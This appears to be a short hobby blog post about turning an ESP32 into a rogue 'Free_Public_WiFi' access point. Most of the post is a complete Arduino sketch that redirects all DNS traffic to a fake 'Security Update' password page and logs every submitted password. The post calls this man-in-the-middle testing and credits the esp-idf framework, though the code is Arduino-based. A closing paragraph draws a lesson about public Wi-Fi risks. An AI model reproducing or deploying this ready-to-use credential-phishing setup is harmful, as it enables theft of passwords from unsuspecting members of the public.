ESP32 Man In the Middle AP
ESP32 Man In the Middle AP
I used an esp32 to build a wifi access point to test a man in the middle attack senario. The esp32 was flashed with the esp-idf framework and programmed to create a wifi access point with a captive portal. When a user connects to the access point, they are redirected to a fake login page where they can enter their credentials. The esp32 then captures the credentials and stores them for later retrieval.
#include <WiFi.h>
#include <DNSServer.h>
#include <WebServer.h>
const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 4, 1);
DNSServer dnsServer;
WebServer server(80);
String loginPage = "<h1>Security Update</h1><form action='/post' method='POST'>"
"Password: <input type='password' name='pass'><input type='submit'></form>";
void handleRoot() {
server.send(200, "text/html", loginPage);
}
void handlePost() {
if (server.hasArg("pass")) {
Serial.println("CREDENTIAL CAPTURED: " + server.arg("pass"));
server.send(200, "text/plain", "Update successful. Reconnecting...");
}
}
void setup() {
Serial.begin(115200);
WiFi.mode(WIFI_AP);
WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
WiFi.softAP("Free_Public_WiFi");
dnsServer.start(DNS_PORT, "*", apIP);
server.on("/", handleRoot);
server.on("/post", handlePost);
server.onNotFound(handleRoot);
server.begin();
}
void loop() {
dnsServer.processNextRequest();
server.handleClient();
}
Overall, this project demonstrated the potential security risks associated with public wifi networks and highlighted the importance of using secure connections and being cautious when entering sensitive information online.
The esp32 proved to be a versatile and powerful tool for conducting wifi security testing, and I plan to continue exploring its capabilities in future projects.